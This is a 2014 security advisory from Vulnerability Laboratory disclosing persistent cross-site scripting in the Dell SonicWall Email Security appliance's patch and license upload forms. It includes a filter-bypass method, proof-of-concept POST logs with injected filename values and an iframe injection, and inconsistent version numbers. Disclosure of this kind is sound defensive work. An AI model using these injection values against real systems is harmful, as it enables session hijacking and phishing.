1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 |
Document Title: =============== Dell SonicWall EMail Security Appliance Application v7.4.5 - Multiple Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1191 Dell (SonicWall) Security Bulletin: http://www.sonicwall.com/us/shared/download/Support-Bulletin_Email-Security_Scripting_Vulnerability__Resolved_in__ES746.pdf Release Date: ============= 2014-03-26 Vulnerability Laboratory ID (VL-ID): ==================================== 1191 Common Vulnerability Scoring System: ==================================== 3.5 Product & Service Introduction: =============================== While most businesses now have some type of anti-spam protection, many must deal with cumbersome management, frustrated users, inflexible solutions, and a higher-than-expected total cost of ownership. SonicWALL® Email Security can help. Elegantly simple to deploy, manage and use, award-winning SonicWALL Email Security solutions employ a variety of proven and patented technology designed to block spam and other threats effectively, easily and economically. With innovative protection techniques for both inbound and outbound email plus unique management tools, the Email Security platform delivers superior email protection today—while standing ready to stop the new attacks of tomorrow. SonicWALL Email Security can be flexibly deployed as a SonicWALL Email Security Appliance, as a software application on a third party Windows® server, or as a SonicWALL Email Security Virtual Appliance in a VMW® environment. The SonicWALL Email Security Virtual Appliance provides the same powerful protection as a traditional SonicWALL Email Security appliance, only in a virtual form, to optimize utilization, ease migration and reduce capital costs. (Copy of the Vendor Homepage: http://www.sonicwall.com/us/products/Anti-Spam_Email_Security.html) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered multiple persistent input validation vulnerabilities in the official Dell SonicWall EMail Security Appliance v7.4.6 Web-Application. Vulnerability Disclosure Timeline: ================================== 2014-02-07: Researcher Notification & Coordination (Benjamin Kunz Mejri) 2014-02-08: Vendor Notification (Dell Security Team) 2014-02-14: Vendor Response/Feedback (Dell Security Team) 2014-03-25: Vendor Fix/Patch (SonicWall Developer Team) 2014-03-26: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== DELL SonicWall Product: EMail Security Appliance Application 7.4.5.1393 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple persistent input validation web vulnerabilities has been discovered in the official Dell SonicWall EMail Security Appliance v7.4.6 Web-Application. The vulnerability allows remote attackers or low privileged user accounts to inject own malicious script codes via POST method request to compromise the application or user session data/information. The first vulnerability is located in the <code>filename</code> value of the <code>settings_advanced.html</code> file. Remote attackers and low privileged application user accounts are able to inject own malicious script codes to the application-side of the <code>Advanced Settings - Patch hochladen > Patch-Datei</code> module. Attackers can manipulate the file upload POST method request by tampering the session. Next to tampering the session the attacker exchange the file name with a malicious script code as payload. In the next step the website reloads the next firmware upgrade page (wait.html) with the file details. The execute of the injected script code via POST method request occurs at the location of the listed file name value. The security risk of the persistent validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5(-). The second vulnerability is located in the file name value of the settings_upload_dlicense.html file. Remote attackers and low privileged application user accounts are able to inject own malicious script codes to the application-side of the Lizenz Verwaltung - Lizenzen Upload module. The request method is POST and the attack vector is persistent. The execute occurs in the exception context of the license update page module. The security risk of the persistent validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0(+). Exploitation of both vulnerabilities requires to bypass the regular validation of the web application appliance. To bypass the filter remote attackers can inject two payloads with a split in the middle. The validation encodes the first injected payload and the second after the split executes the code. Exploitation of the remote web vulnerabilities requires a privileged user account without user interaction or a remote user with medium to high user interaction. Successful exploitation of the persistent web vulnerabilities results in session hijacking, persistent external redirects, persistent phishing and persistent manipulation of vulnerable connected or affected modules. Request Method: [+] POST Vulnerable Module: [+] Advanced Settings - Patch hochladen > Patch-Datei (settings_advanced.html) [+] Lizenz Verwaltung - Lizenzen Upload > (settings_upload_dlicense.html) Vulnerable Parameter(s): [+] file name Affected Module(s): [+] Firmware Update - Waiting Page (wait.html) [+] License Update Page (exception) Affected Version(s): [+] 7.4.6 Affected Appliance Model(s): [+] Dell SonicWall EMail Security Appliance Web Application - All Models Proof of Concept (PoC): ======================= The two persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged email security application user account and low user interaction or without privileged web-application user account on client-side via POST inject. For security demonstration or to reproduce the vulnerability follow the provided information and steps below. URL: Input http://ess.localhost:8619/settings_advanced.html URL: Execute http://ess.localhost:8619/wait.html PoC: Firmware Update - Status Waiting Site <div style="border-radius: 10px;" class="warning_bubble_content"> <div class="bubble_title">Die Firmware wird aktualisiert...</div> <div class="bubble_text"> <div id="updaterMessage"> Installationsdateien werden vorbereitet. Starten Sie keine Dienste neu! <div class="alert">Email Security ist immer noch mit der Verarbeitung von E-Mails beschäftigt.</div> </div> <div>Aktuelle Produktversion von Email Security 7.4.5.1393.</div> <div>Upgrade mit >>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg.</div> <br> <div><div class="dotdot lefthand"></div></div> <div>Abgelaufene Zeit:<span id="updateMS">00:00:36</span></div> <div id="installProgressText" class="tail_trail"></div> </div> </div> --- PoC Session Logs [POST] --- Status: 302[Moved Temporarily] POST http://ess.localhost:8619/settings_advanced.html Load Flags[LOAD_DOCUMENT_URILOAD_INITIAL_DOCUMENT_URI] Größe des Inhalts[0] Mime Type[text/html] Request Header: Host[esserver.demo.sonicwall.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://esserver.demo.sonicwall.com/settings_advanced.html] Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=48D1C2695CBD91CAAA187C5A9DFFD5DC] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------213272019431414 Content-Disposition: form-data; name="sortFiles" false -----------------------------213272019431414 Content-Disposition: form-data; name="smtpBanner" ><><iframe src=http://www.vulnerability-lab.com/> ;) -----------------------------213272019431414 Content-Disposition: form-data; name="receivedBy" -----------------------------213272019431414 Content-Disposition: form-data; name="dnsTimeout" 2 -----------------------------213272019431414 Content-Disposition: form-data; name="fullHistoryAgeDays" 10 -----------------------------213272019431414 Content-Disposition: form-data; name="whiteListSelf" true -----------------------------213272019431414 Content-Disposition: form-data; name="fullHistoryInbound" false -----------------------------213272019431414 Content-Disposition: form-data; name="fullHistoryOutbound" false -----------------------------213272019431414 Content-Disposition: form-data; name="logLevel" fatal -----------------------------213272019431414 Content-Disposition: form-data; name="dbAging" 366 -----------------------------213272019431414 Content-Disposition: form-data; name="snmpOn" true -----------------------------213272019431414 Content-Disposition: form-data; name="snmpComStr" snwl>>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg -----------------------------213272019431414 Content-Disposition: form-data; name="uploadPatch"; filename=>>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg" Content-Type: image/jpeg 1.2 URL: Input http://ess.localhost:8619/settings_dlicense.html URL: Execute http://ess.localhost:8619/settings_upload_dlicense.html --- PoC Session Logs [POST] --- Status: 200[OK] POST http://ess.localhost:8619/settings_upload_dlicense.html Load Flags[LOAD_DOCUMENT_URILOAD_INITIAL_DOCUMENT_URI] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[esserver.demo.sonicwall.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://esserver.demo.sonicwall.com/settings_upload_dlicense.html] Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=48D1C2695CBD91CAAA187C5A9DFFD5DC; __utma=227649090.1810522928. 1391719457.1391719457.1391719457.1; __utmb=227649090.2.10.1391719457; __utmc=227649090; __utmz=227649090.1391719457.1. 1.utmcsr=esserver.demo.sonicwall.com|utmccn=(referral)|utmcmd=referral|utmcct=/settings_branding.html; __utmv=227649090.| 1=User%3AUnkown=Unknown=1; s_vi=[CS]v1|2979FA11051D0AC5-40000137600ADB77[CE]] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------281841889227097 Content-Disposition: form-data; name="uploadLicenses"; filename=">>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg" Content-Type: image/jpeg Solution - Fix & Patch: ======================= Both vulnerabilities can be patched by a secure parse and encode of the file name value in the 2 affected upload POST method requests. Filter and encode also in the wait.html and license exception the vulnerable output values even if the input is still parsed. SonicWall Solution: ============ We recommend existing users of Dell SonicWALL Email Security upgrade to version 7.4.6 to prevent this cross-site script injection from being executed by unauthorized users. Email Security 7.4.6 is available for download from www.mysonicwall.com. Users should log into mySonicWALL and click on Downloads > Download Center in the navigation panel in the left-hand navigation, then select “Email Security” in the Software Type drop down menu. Security Risk: ============== The security risk of the persistent and non persistent post inject web vulnerabilities are estimated as medium. Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact:admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section:www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com |